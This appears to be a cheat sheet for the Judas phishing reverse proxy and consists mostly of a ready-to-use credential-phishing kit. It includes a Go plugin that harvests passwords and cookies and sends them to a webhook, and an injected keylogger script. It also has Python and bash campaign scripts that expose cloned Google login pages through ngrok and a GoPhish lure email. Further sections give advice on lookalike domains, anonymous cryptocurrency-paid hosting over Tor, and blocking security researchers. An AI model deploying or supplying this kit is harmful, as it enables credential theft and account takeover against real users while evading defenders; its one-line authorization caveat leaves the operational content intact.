Appearance
Judas Phishing Proxy Cheat Sheet
Overview
Judas is a pluggable phishing proxy developed by joncooperworks that specializes in real-time website cloning through reverse proxy functionality. Unlike static phishing pages, Judas creates dynamic clones that mirror the target website's behavior, including JavaScript execution, form submissions, and session management. This makes it particularly effective for bypassing modern security measures and creating convincing phishing campaigns.
⚠️ Warning: This tool is intended for authorized penetration testing and red team exercises only. Ensure you have proper authorization before using against any target.
Installation
Prerequisites
bash
# Install Go 1.16+ and Git
sudo apt update
sudo apt install -y golang-go git build-essential
# Verify Go installation
go version
# Set Go environment variables
export GOPATH=$HOME/go
export PATH=$PATH:$GOPATH/bin
export GO111MODULE=onInstallation from GitHub
bash
# Clone Judas repository
git clone https://github.com/joncooperworks/judas.git
cd judas
# Build Judas
go build -o judas cmd/judas/main.go
# Install to system path
sudo mv judas /usr/local/bin/
# Verify installation
judas --helpGo Module Installation
bash
# Install directly using go install
go install github.com/joncooperworks/judas/cmd/judas@latest
# Verify installation
judas --helpDocker Installation
bash
# Clone repository
git clone https://github.com/joncooperworks/judas.git
cd judas
# Build Docker image
docker build -t judas .
# Run Judas container
docker run -it --rm -p 8080:8080 judas --target https://example.com --address 0.0.0.0:8080
# Run with SSL certificates
docker run -it --rm -p 443:443 -v $(pwd)/certs:/certs judas \
--target https://example.com \
--address 0.0.0.0:443 \
--ssl-cert /certs/cert.pem \
--ssl-key /certs/key.pemManual Build
bash
# Download source code
wget https://github.com/joncooperworks/judas/archive/main.zip
unzip main.zip
cd judas-main
# Install dependencies
go mod download
# Build binary
go build -ldflags="-s -w" -o judas cmd/judas/main.go
# Set permissions
chmod +x judasBasic Usage
Simple Website Cloning
bash
# Clone a website on localhost
judas --target https://example.com --address localhost:8080
# Clone with custom listening address
judas --target https://login.microsoftonline.com --address 0.0.0.0:8080
# Clone with SSL termination
judas --target https://accounts.google.com \
--address 0.0.0.0:443 \
--ssl-cert cert.pem \
--ssl-key key.pem
# Clone with custom user agent
judas --target https://facebook.com \
--address localhost:8080 \
--user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"Advanced Configuration
bash
# Clone with custom headers
judas --target https://example.com \
--address localhost:8080 \
--header "X-Forwarded-For: 192.168.1.100" \
--header "X-Real-IP: 192.168.1.100"
# Clone with proxy support
judas --target https://example.com \
--address localhost:8080 \
--proxy http://proxy.example.com:8080
# Clone with custom timeout
judas --target https://example.com \
--address localhost:8080 \
--timeout 30s
# Clone with verbose logging
judas --target https://example.com \
--address localhost:8080 \
--verboseSSL/TLS Configuration
bash
# Generate self-signed certificates
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes \
-subj "/C=US/ST=State/L=City/O=Organization/CN=phishing.example.com"
# Use Let's Encrypt certificates
certbot certonly --standalone -d phishing.example.com
judas --target https://example.com \
--address 0.0.0.0:443 \
--ssl-cert /etc/letsencrypt/live/phishing.example.com/fullchain.pem \
--ssl-key /etc/letsencrypt/live/phishing.example.com/privkey.pem
# Use custom CA certificates
judas --target https://example.com \
--address localhost:8080 \
--ca-cert custom-ca.pemPlugin Development
Basic Plugin Structure
go
// plugins/logger/logger.go
package main
import (
"fmt"
"log"
"net/http"
"time"
"github.com/joncooperworks/judas/pkg/judas"
)
// LoggerPlugin logs all requests and responses
type LoggerPlugin struct {
logFile string
}
// NewLoggerPlugin creates a new logger plugin
func NewLoggerPlugin(logFile string) *LoggerPlugin {
return &LoggerPlugin{
logFile: logFile,
}
}
// ProcessRequest processes incoming requests
func (p *LoggerPlugin) ProcessRequest(req *http.Request) error {
log.Printf("[REQUEST] %s %s from %s", req.Method, req.URL.Path, req.RemoteAddr)
// Log form data
if req.Method == "POST" {
req.ParseForm()
for key, values := range req.PostForm {
for _, value := range values {
log.Printf("[FORM] %s: %s", key, value)
}
}
}
return nil
}
// ProcessResponse processes outgoing responses
func (p *LoggerPlugin) ProcessResponse(resp *http.Response) error {
log.Printf("[RESPONSE] %d %s", resp.StatusCode, resp.Status)
return nil
}
// Name returns the plugin name
func (p *LoggerPlugin) Name() string {
return "Logger"
}
// Initialize sets up the plugin
func (p *LoggerPlugin) Initialize() error {
log.Printf("Logger plugin initialized with log file: %s", p.logFile)
return nil
}
// Cleanup performs plugin cleanup
func (p *LoggerPlugin) Cleanup() error {
log.Printf("Logger plugin cleanup completed")
return nil
}
// Plugin interface implementation
var Plugin LoggerPluginCredential Harvesting Plugin
go
// plugins/harvester/harvester.go
package main
import (
"encoding/json"
"fmt"
"io/ioutil"
"log"
"net/http"
"os"
"time"
"github.com/joncooperworks/judas/pkg/judas"
)
// Credential represents captured credentials
type Credential struct {
Timestamp time.Time `json:"timestamp"`
IP string `json:"ip"`
UserAgent string `json:"user_agent"`
URL string `json:"url"`
Method string `json:"method"`
FormData map[string]string `json:"form_data"`
Headers map[string]string `json:"headers"`
Cookies map[string]string `json:"cookies"`
}
// HarvesterPlugin captures and stores credentials
type HarvesterPlugin struct {
outputFile string
webhookURL string
credentials []Credential
}
// NewHarvesterPlugin creates a new harvester plugin
func NewHarvesterPlugin(outputFile, webhookURL string) *HarvesterPlugin {
return &HarvesterPlugin{
outputFile: outputFile,
webhookURL: webhookURL,
credentials: make([]Credential, 0),
}
}
// ProcessRequest captures credentials from requests
func (p *HarvesterPlugin) ProcessRequest(req *http.Request) error {
// Only process POST requests with form data
if req.Method != "POST" {
return nil
}
// Parse form data
err := req.ParseForm()
if err != nil {
return err
}
// Check if this looks like a login form
if p.isLoginForm(req.PostForm) {
credential := Credential{
Timestamp: time.Now(),
IP: p.getClientIP(req),
UserAgent: req.UserAgent(),
URL: req.URL.String(),
Method: req.Method,
FormData: make(map[string]string),
Headers: make(map[string]string),
Cookies: make(map[string]string),
}
// Capture form data
for key, values := range req.PostForm {
if len(values) > 0 {
credential.FormData[key] = values[0]
}
}
// Capture relevant headers
for key, values := range req.Header {
if len(values) > 0 && p.isRelevantHeader(key) {
credential.Headers[key] = values[0]
}
}
// Capture cookies
for _, cookie := range req.Cookies() {
credential.Cookies[cookie.Name] = cookie.Value
}
// Store credential
p.credentials = append(p.credentials, credential)
// Log capture
log.Printf("[HARVEST] Captured credentials from %s", credential.IP)
// Save to file
p.saveCredential(credential)
// Send webhook notification
if p.webhookURL != "" {
go p.sendWebhook(credential)
}
}
return nil
}
// isLoginForm checks if the form contains login-like fields
func (p *HarvesterPlugin) isLoginForm(form map[string][]string) bool {
loginFields := []string{
"username", "email", "user", "login", "account",
"password", "pass", "pwd", "passwd",
}
for field := range form {
for _, loginField := range loginFields {
if field == loginField ||
fmt.Sprintf("%s", field) == loginField {
return true
}
}
}
return false
}
// getClientIP extracts the real client IP
func (p *HarvesterPlugin) getClientIP(req *http.Request) string {
// Check X-Forwarded-For header
if xff := req.Header.Get("X-Forwarded-For"); xff != "" {
return xff
}
// Check X-Real-IP header
if xri := req.Header.Get("X-Real-IP"); xri != "" {
return xri
}
// Fall back to RemoteAddr
return req.RemoteAddr
}
// isRelevantHeader checks if a header is relevant for logging
func (p *HarvesterPlugin) isRelevantHeader(header string) bool {
relevantHeaders := []string{
"User-Agent", "Accept", "Accept-Language", "Accept-Encoding",
"Referer", "Origin", "X-Forwarded-For", "X-Real-IP",
}
for _, relevant := range relevantHeaders {
if header == relevant {
return true
}
}
return false
}
// saveCredential saves credential to file
func (p *HarvesterPlugin) saveCredential(credential Credential) {
file, err := os.OpenFile(p.outputFile, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
log.Printf("Error opening output file: %v", err)
return
}
defer file.Close()
// Write as JSON
data, err := json.Marshal(credential)
if err != nil {
log.Printf("Error marshaling credential: %v", err)
return
}
file.Write(data)
file.WriteString("\n")
}
// sendWebhook sends credential data to webhook
func (p *HarvesterPlugin) sendWebhook(credential Credential) {
// Implementation for webhook notification
// This would send the credential data to a remote endpoint
log.Printf("Sending webhook notification for credential from %s", credential.IP)
}
// ProcessResponse processes responses (not used for harvesting)
func (p *HarvesterPlugin) ProcessResponse(resp *http.Response) error {
return nil
}
// Name returns the plugin name
func (p *HarvesterPlugin) Name() string {
return "Harvester"
}
// Initialize sets up the plugin
func (p *HarvesterPlugin) Initialize() error {
log.Printf("Harvester plugin initialized with output file: %s", p.outputFile)
return nil
}
// Cleanup performs plugin cleanup
func (p *HarvesterPlugin) Cleanup() error {
log.Printf("Harvester plugin captured %d credentials", len(p.credentials))
return nil
}
// Plugin interface implementation
var Plugin HarvesterPluginContent Modification Plugin
go
// plugins/modifier/modifier.go
package main
import (
"bytes"
"io/ioutil"
"log"
"net/http"
"regexp"
"strings"
"github.com/joncooperworks/judas/pkg/judas"
)
// ModifierPlugin modifies response content
type ModifierPlugin struct {
replacements map[string]string
injections []string
}
// NewModifierPlugin creates a new modifier plugin
func NewModifierPlugin() *ModifierPlugin {
return &ModifierPlugin{
replacements: make(map[string]string),
injections: make([]string, 0),
}
}
// AddReplacement adds a content replacement rule
func (p *ModifierPlugin) AddReplacement(search, replace string) {
p.replacements[search] = replace
}
// AddInjection adds content to inject
func (p *ModifierPlugin) AddInjection(content string) {
p.injections = append(p.injections, content)
}
// ProcessRequest processes requests (not used for modification)
func (p *ModifierPlugin) ProcessRequest(req *http.Request) error {
return nil
}
// ProcessResponse modifies response content
func (p *ModifierPlugin) ProcessResponse(resp *http.Response) error {
// Only modify HTML content
contentType := resp.Header.Get("Content-Type")
if !strings.Contains(contentType, "text/html") {
return nil
}
// Read response body
body, err := ioutil.ReadAll(resp.Body)
if err != nil {
return err
}
resp.Body.Close()
// Convert to string for modification
content := string(body)
// Apply replacements
for search, replace := range p.replacements {
content = strings.ReplaceAll(content, search, replace)
}
// Inject additional content
for _, injection := range p.injections {
// Inject before closing body tag
content = strings.ReplaceAll(content, "</body>", injection+"</body>")
}
// Add keylogger script
keyloggerScript := `
<script>
document.addEventListener('keydown', function(e) {
fetch('/log-keystroke', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
key: e.key,
timestamp: Date.now(),
target: e.target.name || e.target.id
})
}).catch(() => {});
});
</script>
`
content = strings.ReplaceAll(content, "</head>", keyloggerScript+"</head>")
// Update response body
resp.Body = ioutil.NopCloser(bytes.NewReader([]byte(content)))
resp.ContentLength = int64(len(content))
resp.Header.Set("Content-Length", fmt.Sprintf("%d", len(content)))
log.Printf("[MODIFY] Modified response content (%d bytes)", len(content))
return nil
}
// Name returns the plugin name
func (p *ModifierPlugin) Name() string {
return "Modifier"
}
// Initialize sets up the plugin
func (p *ModifierPlugin) Initialize() error {
// Add default replacements
p.AddReplacement("Sign In", "Sign In (Secure)")
p.AddReplacement("Login", "Login (Verified)")
// Add tracking pixel
trackingPixel := `<img src="/track.gif" width="1" height="1" style="display:none;">`
p.AddInjection(trackingPixel)
log.Printf("Modifier plugin initialized with %d replacements and %d injections",
len(p.replacements), len(p.injections))
return nil
}
// Cleanup performs plugin cleanup
func (p *ModifierPlugin) Cleanup() error {
log.Printf("Modifier plugin cleanup completed")
return nil
}
// Plugin interface implementation
var Plugin ModifierPluginConfiguration and Deployment
Configuration File
yaml
# judas.yaml
target: "https://accounts.google.com"
address: "0.0.0.0:443"
ssl_cert: "/etc/ssl/certs/cert.pem"
ssl_key: "/etc/ssl/private/key.pem"
# Proxy settings
proxy: "http://proxy.example.com:8080"
timeout: "30s"
user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
# Headers to add
headers:
- "X-Forwarded-For: 192.168.1.100"
- "X-Real-IP: 192.168.1.100"
# Plugins
plugins:
- name: "logger"
config:
log_file: "/var/log/judas/access.log"
- name: "harvester"
config:
output_file: "/var/log/judas/credentials.json"
webhook_url: "https://your-server.com/webhook"
- name: "modifier"
config:
replacements:
"Sign In": "Sign In (Secure)"
"Login": "Login (Verified)"
# Logging
log_level: "info"
log_file: "/var/log/judas/judas.log"
# Security
rate_limit: 100
max_connections: 1000Systemd Service
ini
# /etc/systemd/system/judas.service
[Unit]
Description=Judas Phishing Proxy
After=network.target
[Service]
Type=simple
User=judas
Group=judas
WorkingDirectory=/opt/judas
ExecStart=/usr/local/bin/judas --config /etc/judas/judas.yaml
Restart=always
RestartSec=5
# Security settings
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=strict
ProtectHome=true
ReadWritePaths=/var/log/judas
[Install]
WantedBy=multi-user.targetDocker Compose
yaml
# docker-compose.yml
version: '3.8'
services:
judas:
build: .
ports:
- "443:443"
- "80:80"
volumes:
- ./certs:/certs:ro
- ./logs:/logs
- ./config:/config:ro
environment:
- JUDAS_TARGET=https://accounts.google.com
- JUDAS_ADDRESS=0.0.0.0:443
- JUDAS_SSL_CERT=/certs/cert.pem
- JUDAS_SSL_KEY=/certs/key.pem
command: >
judas
--target $${JUDAS_TARGET}
--address $${JUDAS_ADDRESS}
--ssl-cert $${JUDAS_SSL_CERT}
--ssl-key $${JUDAS_SSL_KEY}
--config /config/judas.yaml
restart: unless-stopped
nginx:
image: nginx:alpine
ports:
- "8080:80"
volumes:
- ./nginx.conf:/etc/nginx/nginx.conf:ro
depends_on:
- judas
restart: unless-stoppedNginx Reverse Proxy
nginx
# nginx.conf
events {
worker_connections 1024;
}
http {
upstream judas {
server judas:443;
}
server {
listen 80;
server_name phishing.example.com;
location / {
proxy_pass https://judas;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_set_header X-Forwarded-Proto $scheme;
# SSL settings
proxy_ssl_verify off;
proxy_ssl_session_reuse on;
}
# Logging
access_log /var/log/nginx/judas_access.log;
error_log /var/log/nginx/judas_error.log;
}
}Automation and Scripting
Python Automation Script
python
#!/usr/bin/env python3
# Judas automation script
import subprocess
import time
import json
import os
import requests
import threading
from datetime import datetime
class JudasAutomation:
def __init__(self, target_url, listen_address="0.0.0.0:8080"):
self.target_url = target_url
self.listen_address = listen_address
self.process = None
self.monitoring = False
self.webhook_url = "https://your-webhook-url.com/notify"
self.log_file = "judas.log"
self.credentials_file = "credentials.json"
def start_judas(self, ssl_cert=None, ssl_key=None):
"""Start Judas proxy"""
cmd = [
"judas",
"--target", self.target_url,
"--address", self.listen_address,
"--verbose"
]
if ssl_cert and ssl_key:
cmd.extend(["--ssl-cert", ssl_cert, "--ssl-key", ssl_key])
try:
self.process = subprocess.Popen(
cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
text=True
)
print(f"[+] Judas started with PID: {self.process.pid}")
print(f"[+] Target: {self.target_url}")
print(f"[+] Listening on: {self.listen_address}")
return True
except Exception as e:
print(f"[-] Failed to start Judas: {e}")
return False
def monitor_logs(self):
"""Monitor Judas logs for activity"""
self.monitoring = True
print("[+] Starting log monitoring...")
while self.monitoring:
try:
if self.process and self.process.poll() is None:
# Read stdout
line = self.process.stdout.readline()
if line:
self.process_log_line(line.strip())
time.sleep(0.1)
except Exception as e:
print(f"[-] Log monitoring error: {e}")
time.sleep(5)
def process_log_line(self, line):
"""Process individual log line"""
try:
# Log to file
with open(self.log_file, 'a') as f:
f.write(f"{datetime.now().isoformat()} - {line}\n")
# Check for credential capture
if "POST" in line and any(field in line.lower() for field in ["password", "username", "email"]):
print(f"[+] Potential credential capture: {line}")
self.send_notification({
'type': 'credential_capture',
'log_line': line,
'timestamp': datetime.now().isoformat()
})
# Check for new connections
if "new connection" in line.lower():
print(f"[+] New victim connection: {line}")
self.send_notification({
'type': 'new_connection',
'log_line': line,
'timestamp': datetime.now().isoformat()
})
except Exception as e:
print(f"[-] Error processing log line: {e}")
def send_notification(self, data):
"""Send webhook notification"""
try:
payload = {
'text': f"🎣 Judas Activity: {data['type']}",
'data': data
}
response = requests.post(
self.webhook_url,
json=payload,
timeout=10
)
if response.status_code == 200:
print("[+] Notification sent successfully")
else:
print(f"[-] Notification failed: {response.status_code}")
except Exception as e:
print(f"[-] Notification error: {e}")
def setup_ssl_certificates(self, domain):
"""Setup SSL certificates for domain"""
try:
# Generate self-signed certificate
cmd = [
"openssl", "req", "-x509", "-newkey", "rsa:4096",
"-keyout", "key.pem", "-out", "cert.pem",
"-days", "365", "-nodes",
"-subj", f"/C=US/ST=State/L=City/O=Organization/CN={domain}"
]
result = subprocess.run(cmd, capture_output=True, text=True)
if result.returncode == 0:
print(f"[+] SSL certificates generated for {domain}")
return "cert.pem", "key.pem"
else:
print(f"[-] Failed to generate SSL certificates: {result.stderr}")
return None, None
except Exception as e:
print(f"[-] SSL certificate generation error: {e}")
return None, None
def setup_ngrok_tunnel(self):
"""Setup ngrok tunnel for public access"""
try:
port = self.listen_address.split(':')[1]
# Start ngrok tunnel
ngrok_process = subprocess.Popen([
"ngrok", "http", port
], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(5)
# Get public URL
response = requests.get("http://localhost:4040/api/tunnels")
if response.status_code == 200:
tunnels = response.json()['tunnels']
if tunnels:
public_url = tunnels[0]['public_url']
print(f"[+] Public URL: {public_url}")
return public_url, ngrok_process
except Exception as e:
print(f"[-] Failed to setup ngrok tunnel: {e}")
return None, None
def analyze_traffic(self):
"""Analyze captured traffic"""
try:
if not os.path.exists(self.log_file):
print("[-] No log file found")
return
with open(self.log_file, 'r') as f:
lines = f.readlines()
# Basic analysis
total_requests = len([line for line in lines if "HTTP" in line])
post_requests = len([line for line in lines if "POST" in line])
unique_ips = len(set([
line.split()[2] for line in lines
if len(line.split()) > 2 and "." in line.split()[2]
]))
# Generate report
report = {
'total_requests': total_requests,
'post_requests': post_requests,
'unique_ips': unique_ips,
'analysis_timestamp': datetime.now().isoformat()
}
# Save report
with open('traffic_analysis.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"[+] Traffic analysis complete:")
print(f" Total requests: {total_requests}")
print(f" POST requests: {post_requests}")
print(f" Unique IPs: {unique_ips}")
print(f"[+] Report saved to: traffic_analysis.json")
except Exception as e:
print(f"[-] Traffic analysis error: {e}")
def run_campaign(self, duration_hours=1, use_ssl=False, domain=None):
"""Run complete phishing campaign"""
print("[+] Starting Judas phishing campaign...")
ssl_cert, ssl_key = None, None
# Setup SSL if requested
if use_ssl and domain:
ssl_cert, ssl_key = self.setup_ssl_certificates(domain)
if ssl_cert and ssl_key:
# Update listen address for HTTPS
self.listen_address = self.listen_address.replace(':8080', ':443')
# Setup ngrok tunnel
public_url, ngrok_process = self.setup_ngrok_tunnel()
# Start Judas
if not self.start_judas(ssl_cert, ssl_key):
return False
# Start monitoring in background thread
monitor_thread = threading.Thread(target=self.monitor_logs)
monitor_thread.daemon = True
monitor_thread.start()
# Send start notification
self.send_notification({
'type': 'campaign_start',
'target': self.target_url,
'public_url': public_url,
'duration_hours': duration_hours
})
# Run for specified duration
print(f"[+] Campaign running for {duration_hours} hour(s)...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
# Analyze traffic
self.analyze_traffic()
# Send completion notification
self.send_notification({
'type': 'campaign_complete',
'target': self.target_url
})
# Cleanup
self.cleanup(ngrok_process)
print("[+] Campaign completed successfully")
return True
def cleanup(self, ngrok_process=None):
"""Cleanup processes and files"""
try:
if self.process and self.process.poll() is None:
self.process.terminate()
self.process.wait(timeout=10)
print("[+] Judas process terminated")
if ngrok_process and ngrok_process.poll() is None:
ngrok_process.terminate()
print("[+] Ngrok tunnel stopped")
# Final backup
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
if os.path.exists(self.log_file):
final_backup = f"judas_log_{timestamp}.txt"
os.rename(self.log_file, final_backup)
print(f"[+] Final log backup: {final_backup}")
except Exception as e:
print(f"[-] Cleanup error: {e}")
# Usage example
def main():
# Configuration
target_url = "https://accounts.google.com"
listen_address = "0.0.0.0:8080"
duration_hours = 1
use_ssl = True
domain = "accounts-google-security.com"
# Create automation instance
automation = JudasAutomation(target_url, listen_address)
automation.webhook_url = "https://your-webhook-url.com/notify"
# Run campaign
success = automation.run_campaign(duration_hours, use_ssl, domain)
if success:
print("[+] Campaign completed successfully")
else:
print("[-] Campaign failed")
if __name__ == "__main__":
main()Bash Automation Script
bash
#!/bin/bash
# Judas bash automation script
TARGET_URL="https://accounts.google.com"
LISTEN_ADDRESS="0.0.0.0:8080"
DURATION="3600" # 1 hour
USE_SSL="true"
DOMAIN="accounts-google-security.com"
# Function to start Judas
start_judas() {
echo "[+] Starting Judas proxy..."
local cmd="judas --target $TARGET_URL --address $LISTEN_ADDRESS --verbose"
if [ "$USE_SSL" = "true" ]; then
# Generate SSL certificates
generate_ssl_certificates
cmd="$cmd --ssl-cert cert.pem --ssl-key key.pem"
fi
# Start Judas in background
$cmd > judas.log 2>&1 &
JUDAS_PID=$!
sleep 5
if kill -0 "$JUDAS_PID" 2>/dev/null; then
echo "[+] Judas started successfully (PID: $JUDAS_PID)"
return 0
else
echo "[-] Failed to start Judas"
return 1
fi
}
# Function to generate SSL certificates
generate_ssl_certificates() {
echo "[+] Generating SSL certificates for $DOMAIN..."
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes \
-subj "/C=US/ST=State/L=City/O=Organization/CN=$DOMAIN" 2>/dev/null
if [ $? -eq 0 ]; then
echo "[+] SSL certificates generated successfully"
else
echo "[-] Failed to generate SSL certificates"
fi
}
# Function to setup ngrok tunnel
setup_ngrok() {
echo "[+] Setting up ngrok tunnel..."
local port=$(echo "$LISTEN_ADDRESS" | cut -d':' -f2)
ngrok http "$port" > /dev/null 2>&1 &
NGROK_PID=$!
sleep 5
# Get public URL
PUBLIC_URL=$(curl -s http://localhost:4040/api/tunnels | jq -r '.tunnels[0].public_url')
if [ "$PUBLIC_URL" != "null" ] && [ -n "$PUBLIC_URL" ]; then
echo "[+] Public URL: $PUBLIC_URL"
echo "$PUBLIC_URL" > ngrok_url.txt
return 0
else
echo "[-] Failed to get ngrok URL"
return 1
fi
}
# Function to monitor logs
monitor_logs() {
echo "[+] Starting log monitoring..."
tail -f judas.log | while read line; do
echo "[LOG] $line"
# Check for credential capture
if echo "$line" | grep -qi "POST.*password\|POST.*username\|POST.*email"; then
echo "[+] Potential credential capture detected"
send_notification "credential_capture" "$line"
fi
# Check for new connections
if echo "$line" | grep -qi "new connection"; then
echo "[+] New victim connection"
send_notification "new_connection" "$line"
fi
done &
MONITOR_PID=$!
}
# Function to send notifications
send_notification() {
local type="$1"
local data="$2"
local webhook_url="https://your-webhook-url.com/notify"
if command -v curl &> /dev/null; then
curl -X POST -H "Content-Type: application/json" \
-d "{\"text\":\"🎣 Judas Activity: $type\", \"data\":\"$data\"}" \
"$webhook_url" 2>/dev/null
fi
}
# Function to analyze traffic
analyze_traffic() {
echo "[+] Analyzing captured traffic..."
if [ ! -f "judas.log" ]; then
echo "[-] No log file found"
return
fi
local total_requests=$(grep -c "HTTP" judas.log)
local post_requests=$(grep -c "POST" judas.log)
local unique_ips=$(grep -oP '\d+\.\d+\.\d+\.\d+' judas.log | sort -u | wc -l)
echo "[+] Traffic analysis results:"
echo " Total requests: $total_requests"
echo " POST requests: $post_requests"
echo " Unique IPs: $unique_ips"
# Save analysis to file
cat > traffic_analysis.txt << EOF
Traffic Analysis Report
Generated: $(date)
Target: $TARGET_URL
Duration: $DURATION seconds
Total requests: $total_requests
POST requests: $post_requests
Unique IPs: $unique_ips
EOF
echo "[+] Analysis saved to: traffic_analysis.txt"
}
# Function to cleanup
cleanup() {
echo "[+] Cleaning up..."
if [ -n "$JUDAS_PID" ]; then
kill "$JUDAS_PID" 2>/dev/null
echo "[+] Judas stopped"
fi
if [ -n "$NGROK_PID" ]; then
kill "$NGROK_PID" 2>/dev/null
echo "[+] Ngrok tunnel stopped"
fi
if [ -n "$MONITOR_PID" ]; then
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Log monitoring stopped"
fi
# Final backup
if [ -f "judas.log" ]; then
local timestamp=$(date +"%Y%m%d_%H%M%S")
cp judas.log "judas_log_$timestamp.txt"
echo "[+] Final log backup: judas_log_$timestamp.txt"
fi
exit 0
}
# Set trap for cleanup
trap cleanup SIGINT SIGTERM
# Main execution
main() {
echo "[+] Judas Automation Script"
echo "[+] Target: $TARGET_URL"
echo "[+] Listen Address: $LISTEN_ADDRESS"
echo "[+] Duration: $DURATION seconds"
echo "[+] SSL: $USE_SSL"
# Check dependencies
for cmd in judas openssl curl jq; do
if ! command -v "$cmd" &> /dev/null; then
echo "[-] Required command not found: $cmd"
exit 1
fi
done
# Setup ngrok tunnel
if setup_ngrok; then
# Start Judas
if start_judas; then
# Start log monitoring
monitor_logs
# Send start notification
send_notification "campaign_start" "Target: $TARGET_URL, Duration: $DURATION seconds"
# Run for specified duration
echo "[+] Campaign running for $DURATION seconds..."
sleep "$DURATION"
# Analyze traffic
analyze_traffic
# Send completion notification
send_notification "campaign_complete" "Target: $TARGET_URL"
fi
fi
cleanup
}
# Execute main function
mainIntegration with Other Tools
GoPhish Integration
python
# Integrate Judas with GoPhish for email delivery
import requests
import json
class GoPhishJudasIntegration:
def __init__(self, gophish_url, gophish_api_key, judas_url):
self.gophish_url = gophish_url
self.gophish_api_key = gophish_api_key
self.judas_url = judas_url
self.headers = {
'Authorization': f'Bearer {gophish_api_key}',
'Content-Type': 'application/json'
}
def create_gophish_campaign(self):
"""Create GoPhish campaign with Judas URL"""
campaign_data = {
"name": "Judas Proxy Campaign",
"template": {
"name": "Account Security Alert",
"subject": "Immediate Action Required: Verify Your Account",
"html": f"""
<html>
<body>
<h2>Security Alert</h2>
<p>We've detected unusual activity on your account that requires immediate attention.</p>
<p>Please verify your identity to secure your account:</p>
<p><a href="{self.judas_url}" style="background-color: #1a73e8; color: white; padding: 12px 24px; text-decoration: none; border-radius: 4px;">Verify Account Now</a></p>
<p>This verification link will expire in 24 hours.</p>
<p>If you did not request this verification, please contact support immediately.</p>
</body>
</html>
""",
"text": f"Please verify your account by visiting: {self.judas_url}"
},
"page": {
"name": "Judas Redirect",
"html": f'<script>window.location.href="{self.judas_url}";</script>',
"redirect_url": self.judas_url
}
}
response = requests.post(
f"{self.gophish_url}/api/campaigns",
headers=self.headers,
json=campaign_data
)
return response.json()
# Usage
integration = GoPhishJudasIntegration(
"http://localhost:3333",
"your_gophish_api_key",
"https://your-judas-proxy.com"
)
campaign = integration.create_gophish_campaign()Metasploit Integration
bash
# Use Judas for credential harvesting, then pivot to Metasploit
# After capturing credentials through Judas, use them in Metasploit
# Example: Use captured credentials for further exploitation
use auxiliary/scanner/http/http_login
set RHOSTS target-server.com
set USERNAME captured_username
set PASSWORD captured_password
run
# Use captured session cookies
use auxiliary/scanner/http/cookie_replay
set COOKIE "captured_session_cookie"
set RHOSTS target.com
runEvilGinx2 Integration
bash
# Combine Judas with EvilGinx2 for advanced phishing
# Use Judas for initial website cloning
# Use EvilGinx2 for 2FA bypass and session management
# Start Judas for website cloning
judas --target https://accounts.google.com --address localhost:8080
# Configure EvilGinx2 to use Judas as upstream
# This allows combining real-time cloning with 2FA bypassOperational Security
Infrastructure Security
bash
# Use VPS with anonymous payment
# Setup through Tor/VPN
# Use legitimate domain names
# Implement proper SSL certificates
# Example secure deployment
# 1. Purchase VPS with cryptocurrency
# 2. Access through Tor browser
# 3. Register domain with privacy protection
# 4. Setup Let's Encrypt SSL
# 5. Configure proper logging and monitoringDomain and SSL Setup
bash
# Register legitimate-looking domain
# Example: accounts-google-verification.com
# Setup Let's Encrypt SSL
certbot certonly --standalone -d your-domain.com
# Use with Judas
judas --target https://accounts.google.com \
--address 0.0.0.0:443 \
--ssl-cert /etc/letsencrypt/live/your-domain.com/fullchain.pem \
--ssl-key /etc/letsencrypt/live/your-domain.com/privkey.pemTraffic Obfuscation
bash
# Use CDN services (CloudFlare, AWS CloudFront)
# Implement realistic timing delays
# Use common ports (80, 443)
# Mimic legitimate traffic patterns
# Example CloudFlare setup
# 1. Add domain to CloudFlare
# 2. Configure DNS records
# 3. Enable proxy (orange cloud)
# 4. Configure security settings
# 5. Point to Judas proxyAnti-Detection Measures
go
// Implement anti-detection in Judas plugins
func (p *AntiDetectionPlugin) ProcessRequest(req *http.Request) error {
userAgent := req.UserAgent()
// Block security tools
securityTools := []string{
"curl", "wget", "python-requests", "scanner",
"bot", "crawler", "security", "research",
}
for _, tool := range securityTools {
if strings.Contains(strings.ToLower(userAgent), tool) {
return errors.New("blocked security tool")
}
}
// Check for known security company IP ranges
clientIP := getClientIP(req)
if isSecurityCompanyIP(clientIP) {
return errors.New("blocked security company IP")
}
return nil
}Troubleshooting
Common Issues
bash
# Port already in use
sudo netstat -tulpn | grep :8080
sudo kill -9 $(sudo lsof -t -i:8080)
# SSL certificate issues
# Check certificate validity
openssl x509 -in cert.pem -text -noout
# Target website blocking proxy
# Use different user agents
# Implement request delays
# Use proxy chains
# Plugin compilation errors
go mod tidy
go build -o plugin.so -buildmode=plugin plugin.goDebug Mode
bash
# Enable verbose logging
judas --target https://example.com --address localhost:8080 --verbose
# Check Judas logs
tail -f judas.log
# Test proxy functionality
curl -v http://localhost:8080
# Verify SSL configuration
openssl s_client -connect localhost:443Performance Optimization
bash
# Optimize for high traffic
# Increase file descriptor limits
ulimit -n 65536
# Monitor resource usage
htop
iotop
netstat -tulpn
# Use connection pooling
# Implement caching
# Scale horizontally with load balancerBest Practices
Campaign Planning
- Target analysis: Understand target website structure and behavior
- Infrastructure setup: Use secure and anonymous hosting
- Domain selection: Choose convincing domain names
- SSL implementation: Use legitimate SSL certificates
- Plugin development: Create custom plugins for specific needs
Legal and Ethical Considerations
bash
# Authorized testing only
# Obtain proper written authorization
# Follow responsible disclosure
# Protect captured data
# Document all activities
# Data protection measures
# Encrypt captured credentials
# Secure data transmission
# Implement data retention policies
# Regular security auditsPerformance and Scalability
bash
# Optimize proxy performance
# Use efficient plugins
# Implement caching strategies
